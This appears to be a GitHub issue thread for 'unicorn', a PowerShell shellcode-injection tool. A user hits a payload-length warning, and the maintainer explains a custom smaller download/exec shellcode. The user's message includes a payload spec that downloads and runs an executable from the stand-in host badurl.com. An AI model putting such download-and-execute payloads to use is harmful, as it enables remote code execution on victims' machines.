Length of the payload is above command line limit length of 8191

trustedsec / unicorn

Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber's powershell attacks and the powershell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.

https://www.trustedsec.com

Other

3.73k stars 812 forks source link

Length of the payload is above command line limit length of 8191 #56

Closed praveenyadav1602 closed 6 years ago

praveenyadav1602 commented 6 years ago

hello i getting warning and my .exe is only 32 kb. i am using: windows/download_exec exe=test.exe url=http://badurl.com/payload.exe

[!] WARNING. WARNING. Length of the payload is above command line limit length of 8191. Recommend trying to generate again or the line will be cut off. Press {return} to continue.

what is cause?

trustedsec commented 6 years ago

Primary issue here is that the payload for download_exec is much larger now for some reason and when converting the binary to C in order to execute and run, its larger than the length of 8191l..It's not your binary, its Metasploits download_exec binary..

trustedsec commented 6 years ago

That was a fun one to write, I moved off of Metasploit due to it being way too large of a binary. I have a custom download/exec shellcode now written into unicorn that dynamically patches the code with your own URL and its super small. Shaved around a 1000 bytes off of it doing it this method. It's now released in version 2.10 :)